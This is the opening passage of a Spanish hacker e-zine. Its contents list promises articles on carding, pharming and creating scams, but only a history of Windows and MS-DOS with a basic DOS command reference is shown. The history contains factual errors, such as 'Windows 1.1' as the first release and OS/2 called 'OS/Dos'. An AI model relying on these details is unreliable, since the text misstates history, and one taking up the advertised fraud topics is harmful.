Bl4ck-P0r74l E-ZINE Staff: ~ Director: Lessiem & Satyricon ~ Diseño de la H-Zine: Lessiem & Satyricon ~ Coordinador: Lessiem & Satyricon Escritores: ~ Sección Windows: “Historia y Evolucion de Windows” By: Selenity ~ Seccion Linux: “Limpiando Nuestro Linux” By: Lessiem ~ Sección Pharming: “¿Que es Pharming y Como Efectuarlo?” By: Lessiem ~ Sección Nmap: “Que Es Nmap y Tecnicas de Escaneo” By: V4ndid4 ~ Sección Programacion: “Sockets en C++” By: [SeC] ~ Sección Carding: “Primeros Pasos Sobre el Carding” By: ic4r0z ~ Sección Hardware: “Introduccion al Mundo de los PIC'S” By: Satyricon ~ Sección Scam's: “Como Crear un Scam” By: Satyricon & Lessiem ~ Sección Hardware: “Metodos de Refrigeracion” By: Satyricon Bl4ck~P0r74l E-zine esta dedicada a todos aquellos habitantes de la world wide web que quieren aprender algo fuera de lo normal y a aquellos que alguna vez se preguntaron “¿Como lo hacen?”. Esta dedicada a todos aquellos VERDADEROS maestros en estas artes a los que le debemos la gran mayoria de lo que sabemos. “Lo que sabemos es una gota de agua; lo que ignoramos es el océano” Isaac Newton Seccion Windows By: Selenity 1.0 Aclarando Conceptos Antes de profundizar en la materia y a sumergirnos en los aspectos más interesantes del conocimiento de este popular sistema operativo vamos a recapitular unos breves párrafos de información básica que nos ayudaran a comprender que es realmente Windows para poder continuar después analizando como funciona y se desarrolla. 1.1 ¿Qué es Windows? Windows es un S.O desarrollado y comercializado por la empresa Microsoft Corporation, empresa dedicada al sector informático, su creador es Bill Gates.Windows es un sistema closed source. 1.2 ¿De donde procede su nombre y que significa? El significado etimológico de la palabra Windows es ventanas, dicho nombre le fue asignado basándose en su interfaz gráfica de usuario (GUI), basada en ventanas. Los sistemas operativos de la familia Windows de Microsoft siempre han recibido este nombre, ya que aunque han cambiado de apariencia y estructura interna, el funcionamiento básico de sus principales funciones se ejecuta mediante ventanas de aplicación. 1.3 ¿Quién es Bill Gates? Es un empresario estadounidense, cofundador de la empresa de software Microsoft productora del sistema operativo para computadoras personales más utilizado en el mundo, Microsoft Windows. 1.4 ¿Qué significa Closed Source? Un software o sistema que use closed source, significa que su código fuente no se encuentra disponible para cualquier usuario, es decir no se hace público. Se le llama así en contraposición al código abierto. El software no libre utiliza un código cerrado. Por su calidad de secreto industrial, su divulgación constituye un delito. Esto lo que quiere decir es que para liberar el código fuente necesario para la utilización de este tipo de aplicaciones se requiere una clave que se adquiere por medio de licencia previo pago de una tasa establecida por la compañía creadora del software, en el caso de Windows será la empresa Microsoft Corporation quien fije el precio de la licencia de uso del programa mediante la cual en función de los requisitos establecidos en el contrato nos dará acceso a todas las actualizaciones. La distribución de licencias por medios tales como la copia o reduplicación (mas conocidas como copias piratas) o su libre distribución sin la previa autorización de sus creadores incurren un delito establecido en el código penal porque atenta contra la ley de protección de la propiedad intelectual. Esta es una de las principales características que distancia y desmarca a Windows de otros proyectos de software que están adquiriendo consistencia en el mercado informático y de la ingeniería de software, creaciones como GNU Linux son proyectos de código abierto y de libre distribución entre sus usuarios que obtienen todos los accesos y actualizaciones de forma gratuita. La rápida expansión del denominado “software libre” ha conseguido que continuamente se sumen desarrolladores y programadores de software a la causa, consiguiendo productos de calidad excepcional que nada tienen que envidiar a las empresas privadas del sector, por lo que el desarrollo de programas y aplicaciones de código libre es cada día mayor y esto hace que se superen mas fácilmente barreras iniciales como la compatibilidad de un software libre con diferentes aplicaciones del mercado, puesto que los fabricantes desean ampliar su catalogo de ofertas ,por lo que cada vez son mas ,los que incluyen versiones de sus productos compatibles con software de libre distribución. Esta es una de las principales causas por las que Microsoft esta dejando de escalar puestos en las principales posiciones del ranking que había monopolizado durante mucho tiempo .Mientras que su competencia de código abierto Linux gana adeptos entre los usuarios ,situación que ha puesto en jaque en reiteradas ocasiones al gigante de Microsoft. 1.5 Mirando al futuro… ¿Es posible un Windows open source? Si nos basamos en la historiografía de Windows esto seria prácticamente imposible, puesto que Microsoft siempre se ha caracterizado por la privatización de su software y de acaparar siempre un elevado porcentaje en la industria informática por lo que amenudo se le ha tachado de monopolista, si a ello sumamos la incesante lucha que mantienen contra la piratería y la elevada cantidad de recursos que emplea anualmente para combatirla, la simple idea de la posibilidad de que Microsoft decida abrir el código de Windows libremente para los usuarios resultaría simplemente inverosímil. Aun así las nuevas tecnologías de las información se caracterizan por una constate innovación de los proyectos realizados y por una competencia extrema, algo que obliga constantemente a las compañías a desarrollar su creatividad de mercado y evaluar sus estrategias de marketing con nuevas proyecciones que les ayuden a mantenerse entre los primeros puestos ,es por ese motivo que la trayectoria de Microsoft hasta ahora ha sido unidireccional, es decir, sin apreciables cambios en sus gestiones de ventas ,teniendo en cuenta que su mayor competidor ha sido siempre el gigante Apple, distribuidora de la serie de ordenadores Macintosh (mas conocidos como Mac)empresa, cuya producción de software también es privada y que además es fabricante de su propio hardware de computación. Pero valorando la imparable expansión de software libre, la gran aceptación de los usuarios hacia este tipo de productos y la perdida de liderazgo de Microsoft, no solo en un sistema como operativo como Windows ,sino en un gran numero de aplicaciones de software cuyo monopolio siempre le había pertenecido como podrían ser ejemplo de ello El navegador Web firefox de Mozilla (una organización sin ánimo de lucro que produce software libre) este navegador ha desbancado completamente al hasta ahora insustituible Internet Explorer, aplicación integrada por defecto en el paquete Windows , convirtiéndole así en uno de los navegadores preferidos por los internautas, otro ejemplo de ello seria la polifacética suite de oficina open office, que incluye toda una serie de herramientas funcionales y utilidades similares al la alternativa de siempre Microsoft office ,que se adquiere como paquete adicional para complementar Windows, mientras que open office es gratuita y compatible con todas las plataformas. Todas estas circunstancias adicionales crean una situación de puede obligar a Microsoft y a otros grandes de la industria a plantearse un giro de 180º en el desarrollo y comercialización de sus productos para continuar siendo competitivos. Abrirse a este libre mercado podría suponer una fuente inagotable de recursos en los que el beneficio seria reciproco, por un lado la industria ampliaría el abanico de posibilidades de elección entre los usuarios que podrían seleccionar libremente el tipo de software que mas se adapte a sus necesidades ya que las tasas y la privatización condicionan en gran medida la elección de muchas personas al escoger un producto frente a la libre distribución de productos de calidad competentes en el mercado, además de esto, se mejoraría el catalogo de ofertas complementándose así con una gran marca añadiendo años de experiencia ,valoración y aceptación de un gran numero de usuarios. Por supuesto Microsoft también obtendría un beneficio ganancial de esta propicia situación ya que al abrir su código muchos desarrolladores y programadores de software libre se sumarian a su equipo de trabajo aportando ideas innovadoras y renovando el enfoque y la creatividad, factores imprescindibles en el éxito de una empresa, porque una de las razones que han logrado la popularización de este tipo de software además de su libre distribución han sido las ideas y la innovación empleadas en su desarrollo creando cosas hasta ahora nunca vistas, una perspectiva que parece haberse atrofiado en Microsoft durante el largo periodo que ha permanecido indestronable. Analizando esta reflexión probablemente ahora muchos penséis que la distribución de un Windows libre en el futuro pueda dejar de ser una utopia y convertirse en una realidad, por supuesto que Microsoft no va a “liberalizarse” por completo, eso más que una utopia seria un milagro. Puesto que cada compañía establece las directrices de su construcción en unas bases que no serán modificadas a no ser que cambiasen los patrones generales como por ejemplo fuese absorbida por otra empresa, algo que teniendo en cuenta su patrimonio me parece poco probable. Lo que si podemos tener claro es que en este juego el que no innova muere o mejor dicho lo matan y que esa “muerte comercial” es algo que Microsoft jamás podría consentir pues atentaría contra el imperio que ha consolidado durante años. De modo que si para seguir siendo competitivo tiene que abrir el código de Windows lo hará inevitablemente, aunque conociendo a Microsoft siempre puede crear un segundo sistema operativo u una versión especial de Windows que siga siendo privada, algo así como una versión de Windows que sea “Premium Edition” con mas funciones y complementos ,en cualquier caso tenemos que ser optimistas porque el continuo proceso de evolución en el que se encuentran inmersas las ciencias de la información es sin duda productivo para todos tanto si Microsoft quiere unirse al carro del desarrollo como si no ,no debemos olvidar que las personas que trabajan para la ciencia contribuyen al desarrollo de la misma pero realmente es la ciencia la que debe trabajar para las personas que son los indudables contribuyentes a su mejora y los utilitarios de sus funcionalidades por lo que nada en el mundo resulta tan expectante como la idea de que en un futuro la información y la tecnología fueses libres y accesibles para todo el mundo y que episodios como la privatización de software ,las restricciones al acceso de la información o la censura de contenidos sean solamente un capitulo cerrado en la historia de la evolución y el desarrollo de la información. 2.0 Un Poco De Historia...... Vamos a hacer un repaso por la historiografía de Windows desde el lanzamiento de su primera versión hasta la actualidad comprendiendo y analizando las mejoras y pormenores que han ido confeccionando este sistema operativo durante décadas, por lo que vamos a centrarnos únicamente en las más representativas y que han añadido mejoras consistentes que contribuyeron a mejorar el formato. 2.1 Los orígenes En 1985 Microsoft publicó la primera versión de Windows, Windows 1.1 una interfaz gráfica de usuario (GUI) para su propio sistema operativo (MS-DOS) que había sido incluido en el IBM PC y ordenadores compatibles desde 1981. La primera versión de Microsoft Windows Premium nunca fue demasiado potente ni tampoco se hizo popular. Estaba severamente limitada debido a los recursos legales de Apple, que no permitía imitaciones de sus interfaces de usuario. Por ejemplo, las ventanas sólo podían disponerse en mosaico sobre la pantalla; esto es, nunca podían solaparse u ocultarse unas a otras. Tampoco había "papelera de reciclaje" debido a que Apple creía que ellos tenían la patente de este paradigma o concepto. Ambas limitaciones fueron eliminadas cuando el recurso de Apple fue rechazado en los tribunales. Windows 2.0 Apareció en 1987, y fue un poco más popular que la versión inicial. Gran parte de esta popularidad la obtuvo de la inclusión en forma de versión "Run-time" de nuevas aplicaciones gráficas de Microsoft, Microsoft Excel y Microsoft Word para Windows. Windows 3.0 La primera versión realmente popular de Windows fue la versión 3.0, publicada en 1990. Ésta se benefició de las mejoradas capacidades gráficas para PC de esta época, y también del microprocesador 80386, que permitía mejoras en las capacidades multitarea de las aplicaciones Windows. Esto permitiría ejecutar en modo multitarea viejas aplicaciones basadas en MS-DOS. Windows 3 convirtió al IBM PC en un serio competidor para el Apple Macintosh. Hasta aquí acabamos de comprobar los intentos de Microsoft por hacerse con el mercado internacional y de la rivalidad con Apple, empresa que ya comenzada apuntando maneras en el sector. Pero como en toda evolución y lanzamiento de una idea su éxito depende de la capacidad de sus creadores de sortear obstáculos tales como la rivalidad comercial y la competencia de mercado, de modo que antes de haber prosperado tiene que crearse un punto de inflexión que propicia este desarrollo, normalmente suele darse un cúmulo de circunstancias que desencadenadas de manera apropiada se convierten en factores indispensables para sobreponerse a las dificultades del proyecto aprovechando las ocasiones de demanda y anteponiendo un gran despliegue de recursos dispuestos a satisfacer las necesidades de los usuarios. De modo que esto fue lo que precisamente supo aprovechar Microsoft encontrándose en el sitio adecuado en el momento justo las circunstancias que lo impulsaron: una plataforma de software en expansión, una gigantesca demanda de software de ejecución mediante una interfaz grafica intuitiva ya que la gente no terminaba de familiarizarse con las líneas de comandos de los antecesores a Windows y por supuesto la liberalización de patentes como hemos visto anteriormente que permitieron a Microsoft elaborar patrones similares a aplicaciones exitosas que se encontraban ya en el mercado. Todos estos factores contribuyeron en gran medida a la elaboración, desarrollo y lanzamiento de la plataforma Windows, pero como en toda creación también tuvieron su punto de inflexión que le ayudaron a alcanzar el éxito. Para comprender esto voy a realizar una síntesis de la información que he recopilado de Wikipedia sobre el proyecto OS/Dos, un sistema operativo de IBM que intentó suceder a DOS como sistema operativo de los PC. Se desarrolló inicialmente de manera conjunta entre Microsoft e IBM, algo que dio a Microsoft autonomía para continuar con la expansión de Windows ya que después de la creación de OS/DOS continuaron desarrollando Windows 3.0 mientras que IBM por su parte también continuo el sistema OS/DOS en solitario. Si bien no fue relevante esta fusión, si contribuyo a la idea de desarrollo de Windows como sistema operativo único y genérico y es muy probable que los resquicios iniciales de la simbiosis de OS/ DOS y Windows resultasen los pilares fundamentales de la evolución de aquel primitivo Windows a la plataforma consolidada que es actualmente. 2.2 Datos sobre OS/2 Durante la segunda mitad de los 80, Microsoft e IBM habían estado desarrollando conjuntamente OS/2 como sucesor del DOS, para sacar el máximo provecho a las capacidades del procesador Intel 80286. OS/2 utilizaba el direccionamiento hardware de memoria disponible en el Intel 80286 para poder utilizar hasta 16 MB de memoria. La mayoría de los programas de DOS estaban por el contrario limitados a 640 KB de memoria. OS/2 1.x también soportaba memoria virtual y multitarea. A principio de los 90, crecieron las tensiones en la relación entre IBM y Microsoft. Cooperaban entre sí en el desarrollo de sus sistemas operativos para PC y cada uno tenía acceso al código del otro. Microsoft quería desarrollar Windows aún más, mientras IBM deseaba que el futuro trabajo estuviera basado en OS/2. IBM publicó OS/2 versión 2.0 en 1992. Esta versión suponía un gran avance frente a OS/2 1.3. Incorporaba un nuevo sistema de ventanas orientado a objetos llamado Workplace Shell como sustituto del Presentación Manager, un nuevo sistema de ficheros, HPFS, para reemplazar al sistema de ficheros FAT de DOS usado también en Windows y aprovechaba todas las ventajas de las capacidades de 32 bit del procesador Intel 80386. IBM continuó vendiendo OS/2, produciendo versiones posteriores como OS/2 3.0 (también llamado Warp) y 4.0 (Merlín). Pero con la llegada de Windows 95, OS/2 comenzó a perder cuota de mercado. Aunque OS/2 seguía corriendo aplicaciones de Windows 3.0, carecía de soporte para las nuevas aplicaciones que requerían Windows 95. Al contrario que con Windows 3.0, IBM no tenía acceso al código fuente de Windows 95; y tampoco tenía el tiempo ni los recursos necesarios para emular el trabajo de los programadores de Microsoft con Windows 95; no obstante, OS/2 3.0 (Warp) apareció en el mercado antes que Windows 95 (que se retrasaba respecto a la fecha inicial de lanzamiento); como mejoras incorporaba una reducción en los requisitos de hardware. Lamentablemente, el posterior abandono por parte de IBM hizo que fuese quedando relegado. A partir de aquí comienza el verdadero despliegue de Windows después de la desvinculación de Microsoft en el proyecto OS/Dos añadiendo mejoras de desarrollo a su proyecto inicial y empleando todos los recursos posibles para posicionar a Windows en los puestos mas altos de la industria del software. Vamos a repasar ahora las versiones más significativas de Windows sus respectivas características. 2.3 Principales versiones de Windows Windows 3.1 y Windows 3.11 En respuesta a la aparición de OS/2 0, Microsoft desarrolló Windows 3.1, que incluía diversas pequeñas mejoras a Windows 3.0 (como las fuentes escalables TrueType), pero que consistía principalmente en soporte multimedia. Más tarde Microsoft publicó el Windows 3.11 (denominado Windows para trabajo en grupo), que incluía controladores y protocolos mejorados para las comunicaciones en red y soporte para redes punto a punto. Windows NT Siendo un sistema operativo completamente nuevo, Windows NT sufrió problemas de compatibilidad con el hardware y el software existentes. También necesitaba gran cantidad de recursos y éstos estaban solamente disponibles en equipos grandes y caros. Debido a esto muchos usuarios no pudieron pasarse a Windows NT. La interfaz gráfica de NT todavía estaba basada en la de Windows 3.1 que era inferior a la Workplace Shell de OS/2. Windows 95 Windows 95 tenía dos grandes ventajas para el consumidor medio. Primero, aunque su interfaz todavía corría sobre MS-DOS, tenía una instalación integrada que le hacía aparecer como un solo sistema operativo (ya no se necesitaba comprar MS-DOS e instalar Windows encima). Segundo, introducía un subsistema en modo protegido que estaba especialmente escrito a procesadores 80386 o superiores, lo cual impediría que las nuevas aplicaciones Win32 dañaran el área de memoria de otras aplicaciones Win32. Windows 98 El 25 de junio de 1998 llegó Windows 98. Incluía nuevos controladores de hardware y el sistema de ficheros FAT32 (también soportado por Windows 95 OSR 2 y OSR 2.5) que soportaba particiones mayores a los 2 GB permitidos por Windows 95. Dio soporte también a las nuevas tecnologías como DVD, FireWire, USB o AGP. Era novedosa también la integración del explorador de Internet en todos los ámbitos del sistema. Windows Millenium Edition (ME) En 2000 Microsoft introdujo Windows ME, que era una copia de Windows 98 con más aplicaciones añadidas. Windows ME fue un proyecto rápido de un año para rellenar el hueco entre Windows 98 y el nuevo Windows XP, y eso se notó mucho en la poca estabilidad de esta versión. En teoría, Windows 2000 iba a ser la unificación entre las dos familias de Windows, la empresarial y la de hogar, pero por retrasos se lanzó este pequeño avance. En esta versión se aceleraba el inicio del sistema y oficialmente ya no se podía distinguir entre el MS-DOS y el entorno gráfico. Windows 2000 En este mismo año vio la luz Windows 2000, una nueva versión de Windows NT muy útil para los administradores de sistemas y con una gran cantidad de servicios de red y lo más importante: admitía dispositivos Plug&Play que venían siendo un problema con Windows NT. La familia de Windows 2000 estaba formada por varias versiones del sistema: una para las estaciones de trabajo (Windows 2000 Professional) y varias para servidores (Windows 2000 Server, Advanced Server, Datacenter Server).Windows 2000 incorporaba importantes innovaciones tecnológicas para entornos Microsoft, tanto en nuevos servicios como en la mejora de los existentes. Windows XP La unión de Windows NT/2000 y la familia de Windows 9.x se alcanzó con Windows XP puesto en venta en 2001 en su versión Home y Professional. Windows XP usa el núcleo de Windows NT. Incorpora una nueva interfaz y hace alarde de mayores capacidades multimedia. Además dispone de otras novedades como la multitarea mejorada, soporte para redes inalámbricas y asistencia remota.. Windows Vista Windows Vista apareció en el mercado el 30 de enero de 2007. Cabe destacar los continuos retrasos en las fechas de entrega del sistema operativo. Este sistema operativo, como el Windows ME, ha sido criticado por su falta de compatibilidad, entre otras cosas, haciendo que la mayoría de los usuarios regresen a su antecesor Windows XP o migrar a Mac OS X o GNU/Linux. Windows 7 Es la siguiente versión de Windows actualmente en Beta, la cual es sucesora a Windows Vista. Algunas fuentes indican que Windows 7 se terminará de desarrollar a finales de 2009.A pesar de los rumores recientes de que Windows 7 saldría a la venta en 2009, las últimas declaraciones de Bill Gates vuelven a poner como fecha de salida de este nuevo sistema operativo para 2010, estando disponible en 2009 una versión para Betatesters, y no para el usuario final. 2.4 Regresiones en el proceso evolutivo. Debemos ser conscientes que cualquier prototipo que se aproxime a la perfección requiere de un proceso evolutivo para superar las imperfecciones surgidas durante su desarrollo ya que es la única manera de pulir este procedimiento para conseguir algo bueno de un proyecto aceptable y transformarlo luego en algo mejor. Por lo que a menudo la única forma de obtener los mejores resultados en una creación es en el desarrollo de algo imperfecto que solo pueda perfeccionarse reelaborando el mismo proyecto una y otra vez hasta completar un ciclo de mejoras, solo que en ocasiones este método no siempre parece ser garantía de éxito y esta puede ser la dinámica de trabajo de Microsoft ya que han conseguido llegar a millones de usuarios a través la creación de un proyecto consolidado en base a el perfeccionamiento de proyectos no desarrollados .Algo que en reiteradas ocasiones comprobando el historial de Windows ha sido una premisa constante en la comercialización de este sistema ya que para el lanzamiento de una versión final y perfeccionada, se ha tenido que recopilar previamente el trabajo de las versiones no desarrolladas en el mercado para poder recabar la experiencia de los usuarios que han posibilitado la corrección de errores como Bugs en la seguridad, compatibilidades de hardware y software etc. Esto, además de las características mencionadas anteriormente en cada una de las versiones ayudaría a explicar porque algunas versiones de este sistema operativo han sido exitosas y otras caerán inevitablemente en el olvido .Ejemplo de ello seria la versión NT, un primer intento de Microsoft de salir de la interfaz grafica del 3.1 y dar un nuevo enfoque en los recursos y aplicaciones a lo que posteriormente seria el Windows 95 para posteriormente transformarse en 98 una versión, estable ,funcional y completamente desarrollada. Una replica de esta situación podemos observarla en el sucesor de Windows 98 , Windows ME ha quedado comprobada su función era simplemente de transición entre Windows 98 y Windows 2000 a la que Microsoft dio un giro a la plataforma incorporando numerosas innovaciones a lo que seria mas tarde el proyecto final ,Windows XP ,la versión mas estable desde Windows 98 y que todavía conserva un gran porcentaje de usuarios que lo prefieren a versiones supuestamente mas desarrolladas como Windows vista, que ha presentado numerosos problemas de compatibilidad seguridad y funcionalidad dejando patente que su única misión es desarrollar Windows XP al que finalmente parece ser el desarrollo final de la ultima versión Windows 7 que según Microsoft promete mejorar su interfaz para hacerla más amigable al usuario, con nuevas características que permitirán hacer tareas de una manera más fácil y rápida, al mismo tiempo en que se realizan esfuerzos para lograr un sistema más ligero, estable y rápido. 3.0 El Eslabon Perdido: Rebuscando En La Genealogia De Windows No podríamos continuar nuestra travesía por Windows de ninguna manera sin detenernos en MS-DOS parte sin duda fundamental para el nacimiento de Windows y su posterior desarrollo. Si Windows tuviese un árbol genealógico MSDos seria el más antiguo de sus ancestros, algo equivalente al neandertal en nuestra especie, un prototipo anclado en el pasado pero imprescindible en la evolución de Windows incluso permanece integrado en el aunque de forma no visible. 3.1 ¿Que es MS-DOS? MS-DOS son las siglas de Microsoft Disk Operating System, Sistema operativo de disco de Microsoft. Es un sistema operativo comercializado por Microsoft perteneciente a la familia DOS. Fue un sistema operativo para el IBM PC que alcanzó gran difusión. 3.2 Un breve repaso por su historia. Para conocerlo mejor vamos a hacer un breve repaso de su evolución recopilando información extraída de Wikipedia sobre el historial de sus versiones con las modificaciones y mejoras que se han ido aplicando sobre ellas. • • • • • • • • • PC DOS 1.0 - Liberado en 1981 como complemento al IBM-PC. Primera versión de DOS. Soporta 16 Kb de memoria RAM, disquetes de 5,25 pulgadas de una sola cara de 160 Kb. 22 ordres. Permite archivos con extensión .com. y .exe. Incorpora el intérprete de comandos COMMAND.COM. PC DOS 1.1 - Corregidos muchos errores, soporta disquetes de doble densidad 1.25 - Primera versión liberada con el nombre MS-DOS. MS-DOS 2.0 - Complemento del IBM XT liberado en 1983. Más del doble de nuevos comandos, soporte de disco duro (muy pequeño, alrededor de 5 MB). PC DOS 2.1 - Complemento del IBM PCjr. Añadidas algunas mejoras. MS-DOS 2.11 - Añadido soporte para otros idiomas (aparte del inglés). MS-DOS 2.25 - Versión con un mejor soporte para juegos de caracteres de los idiomas japonés y coreano. MS-DOS 3.0 - Diseñado para soportar el nuevo hardware del IBM AT. Añadidas unas pocas características de LAN. MS-DOS 3.1 - Añadidas más características y soporte LAN. MS-DOS 3.2 - Añadida capacidad para disquetes de 3,5 pulgadas y 720 KB. • • • • • • • • • • • • • • • • PC DOS 3.3 - Añadido soporte para el ordenador PS/2 de IBM y los nuevos disquetes de 3,5 pulgadas de alta capacidad (1,44 MB). Nuevas páginas de código de caracteres internacionales añadidas, con soporte para 17 países. MS-DOS 3.3 - Capacidad para crear particiones de disco superiores a 32 MB. Soporte de 4 puertos serie (antes sólo 2). Incorporación de la ordeer "Files" para poder abrir hasta 255 archivos simultáneamente. MS-DOS 4.0 - Generado con el código fuente de IBM, no con el de Microsoft. PC DOS 4.0 - Agregado DOS Shell, algunas mejoras y arreglos. MS-DOS 4.01 - Versión para corregir algún error. MS-DOS 5.0 - Implementado en 1991, incluyendo más características de administración de memoria y herramientas para soporte de macros, mejora del intérprete de órdenes o shell. MS-DOS 6.0 - Liberado en 1993, incluye soporte para Microsoft Windows, utilidades como Defrag (desfragmentación del disco), DoubleSpace (compresión de archivos), MSBackup (copias de seguridad), MSAV (Microsoft Anti-Virus), MemMaker, etc. MS-DOS 6.2 - Versión para corregir errores. MS-DOS 6.21 - Eliminado el soporte de compresión de disco DoubleSpace. PC DOS 6.3 - Liberado en abril de 1994. MS-DOS 6.22 - Última versión distribuida por separado. Incluido DriveSpace para sustituir a DoubleSpace. PC DOS 7.0 - Añade Stacker para reemplazar a DoubleSpace. MS-DOS 7.0 - Distribuido junto con Windows 95. Incluye soporte para nombres de archivo largos (hasta ahora habían tenido la restricción del 8+3). MS-DOS 7.1 - Integrado en Windows 95 OSR2 y posteriormente en Windows 98 y 98 SE. Soporta sistemas de archivos FAT32. MS-DOS 8.0 - Incluido en Windows Me. Es la última versión de MS-DOS. PC DOS 2000 - Versión que soluciona el problema del año 2000. 3.2 La importancia de MS-DOS: No lo vemos pero continúa estando ahí. Ahora que ya hemos comprobado que es MS-DOS, su evolución y la importancia que ha tenido en Windows es importante conocer los aspectos básicos de su funcionamiento porque aunque habitualmente no usemos MS-DOS en modo directo sigue estando latente en Windows de hecho, todas y cada una de las aplicaciones que ejecutamos en Windows pueden realizarse a través del dos, utilizando únicamente el símbolo del sistema c:\ e incluso podemos resolver problemas con el cuando Windows se satura, lo que denominamos comúnmente “quedarse colgado” El funcionamiento primitivo de MS-DOS se desarrolla a través de las líneas de comandos, que son una combinación de códigos que nos abren el acceso a cada una de las aplicaciones del sistema, pero para ello debemos conocer esas combinaciones de caracteres y resulta de gran utilidad memorizar las mas importantes. 3.3 Al principio solo fueron las líneas de comandos. Uno de los motivos mas importantes que influyeron a Microsoft dar un giro en el desarrollo de sus sistema operativo fue precisamente la forma de uso del DOS, ya que para conocer todos los entresijos del sistema operativo y tener un dominio completo sobre su funcionalidad era necesario manipular una gran lista de comandos y múltiples combinaciones entre si, cosa que resultaba bastante tediosa para un usuario de nivel básico, o quienes únicamente buscaban en el PC un modo de entretenimiento ,pues se sentían poco atraídos por una interfaz pobre y un complejo funcionamiento. De esta demanda precisamente nació Windows para que fuese mas comercial y atractivo se le añadió soporte multimedia, funciones de red, una interfaz grafica atractiva e intuitiva mediante la cual los comandos se ejecutaban a través de las ventanas sin que el usuario tuviera que memorizarlo….Todo ello le dio a Windows un enfoque novedoso, atractivo y desde luego mucho mas practico que su antecesor MS-DOS, algo que se aprecio de forma inmediata en el mercado informático, siendo esta básicamente la esencia de su éxito. No obstante, no debemos olvidar que en pocas palabras y si elimináramos las aplicaciones extras y demás componentes usados en la creación de Windows citados anteriormente, la esencia sigue siendo MS-DOS que continua trabajando silenciosamente en los ordenadores de todo el mundo sin que mucha gente se percate de que sigue estando ahí, y que podemos usarlo cuando queramos. 3.4 Los comandos más importantes. Dada la importancia de MS-DOS en nuestro sistema, me parece relevante recopilar una lista con la ayuda de la información extraída de Wikipedia de los comandos genéricos mas importantes y útiles que podemos usar en Dos, para poder usar las secuencia de comandos debemos arrancar antes MS-DOS, esto lo podemos hacer de un modo directo, que seria arrancar el ordenador directamente con el símbolo del sistema C:\ para ello en el momento que se reinicie el PC debemos de pulsar la tecla que nos permita el acceso al menú de arranque del sistema ,normalmente suele ser la tecla F8,a continuación seleccionaremos la opción “arrancar usando el símbolo del sistema”. También podemos acceder al Dos de forma indirecta a través de Windows usando la ruta, Inicio >Todos los programas >accesorios >símbolo del sistema. Una vez dentro, ya tenemos vía libre para ejecutar a través de las líneas de comandos las diferentes aplicaciones que queramos utilizar en ese momento, este seria un listado de las más importantes a ejecutar para el dominio de las funciones principales. Comandos internos • • • • • • • • • • • • • • • • • • • CD o CHDIR - Cambia el directorio actual. o CD nombre_directorio Cambia al directorio jerárquicamente inferior. o CD \ Cambia directamente al directorio raíz. CLS - Borra la pantalla y regresa el cursor a la esquina superior izquierda . COPY - Copia archivos. o COPY CON - Copia a un archivo el texto tecleado hasta pulsar Ctrl-Z. DATE - Cambia o visualiza la fecha del sistema. DEL o ERASE - Borra un archivo. Siempre y cuando el archivo no se oculte en un fichero. DEL borra el contenido del archivo y ERASE el archivo en si. DIR - Muestra una lista con los archivos y directorios (carpetas) que se encuentran en un directorio del disco. ECHO - Muestra un texto especificado en la pantalla. o ECHO OFF - Oculta el eco de los comandos ejecutados. Nota: se escribe como línea de código, en los archivos de proceso por lotes (.bat) y no en la línea del prompt. EXIT - Sale de una sesión de MS-DOS. MD o MKDIR - Crea un nuevo directorio. PATH - Específica trayectorias, en las cuales el sistema operativo busca archivos ejecutables. Es un comando que se suele escribir en el Config.sys y en archivos de procesos por lotes. PROMPT- Cambia la línea de visualización de la orden. RD o RMDIR - Borra un directorio que esté totalmente vacío. REM - Permite insertar comentarios en archivos de proceso por lotes. REN o RENAME - Renombra archivos y directorios. SET - Asigna valores a variables de entorno. TIME - Visualiza o cambia la hora del reloj interno. TYPE - Muestra el contenido de un fichero. Se utiliza, principalmente, para ver contenidos de ficheros en formato texto. VER - Muestra la versión del Sistema Operativo. VOL - Muestra la etiqueta del disco duro y su volumen (si lo tiene) Comandos externos • ATTRIB - Sin parámetros, visualiza los atributos de los directorios y archivos. Con parámetros, cambia los atributos de directorios y archivos. Los atributos de los directorios, y los ficheros son: de lectura (r), de escritura (w), de archivo (a), oculto (h), de sistema (s). Parámetros: signos (más o menos) y letras r, w, a, y h "v". Ejemplo: Attrib +r *.* (atributo de sólo lectura, para todos los ficheros de ese directorio) • APPEND - Sirve para especificar trayectorias para ficheros de datos. • • • • • • • BACKUP - Ejecuta una copia de seguridad de uno o más archivos de un disco duro a un disquete. CHKDSK - Verifica si hay errores en el disco duro. (También se puede utilizar para corregirlos con el paramentro "/F") DELTREE - Borra un directorio sin importar que contenga subdirectorios con todos sus contenidos. DISKCOPY - Permite hacer una copia idéntica de un disquete a otro, pertenece al grupo de las órdenes externas. DOSKEY - Permite mantener residentes en memoria RAM las órdenes que han sido ejecutadas en el punto indicativo. FC - Compara ficheros. FORMAT - Permite crear la estructura lógica, en una unidad física de almacenamiento (discos duros, disquetes y unidades de almacenamiento masivo). o /s: Crea un diskette de arranque del sistema, en una unidad. o /q: Crea un formato rápido, del diskette. o /u: Formatea de forma incondicional. o /f: xxx: Formatea especificando el tipo de disquete (ejemplos /f:720 ó /f:1.44) Se pueden utilizar estos parámetros combinados. • • • • • • KEYB - Establece el idioma del teclado según el parámetro adicionado (Ejemplo: KEYB SP para el teclado español). LABEL - Muestra o cambia la etiqueta de la unidad de disco duro. MEM - Muestra la memoria RAM, el espacio ocupado y el espacio libre. MOVE - Mueve o cambia de posición un directorio y/o ficheros. También renombra subdirectorios. SUBST - Crea una unidad lógica virtual a partir de un directorio. TREE - Presenta en forma gráfica la estructura de un directorio. Redireccionamientos • • • < - Re direccionamiento de la entrada estándar. Su sintaxis es comando < fichero. > - Re direccionamiento de la salida estándar. Su sintaxis es comando > fichero. >> - Re direccionamiento de la salida estándar a un fichero existente. Su sintaxis es comando >> fichero. Filtros • • • • | - Pipe o tubería, concatena comandos. | more - Separa por páginas la salida estándar, (Ejemplo: DIR | MORE). |sort - Ordena por orden alfabético la salida estándar. |find - Busca una cadena de texto en la salida estándar. 3.5 2x1=DOS Tan sencilla como esta regla matemática resulta la mecánica de funcionamiento del DOS basándose en la combinación de caracteres para generar un resultado. Si lo analizamos detenidamente MS-DOS no es más que un patrón de programación, en este caso la programación Windows. Si nos fijamos cualquier lenguaje de programación ya sea de alto nivel o no tiene un funcionamiento bastante similar ya que en la programación cualquier aplicación es desarrollada a través de una secuencia determinada de caracteres que nos ofrecen como resultado un proceso, lo mismo que realizamos cuando redireccionamos los comandos del dos a través de esa secuencia de caracteres. Todo el material expuesto en este artículo no es más que una breve síntesis del potencial de MS-DOS. Por lo que aquellos que deseen adquirir un conocimiento avanzado en las aplicaciones de Windows 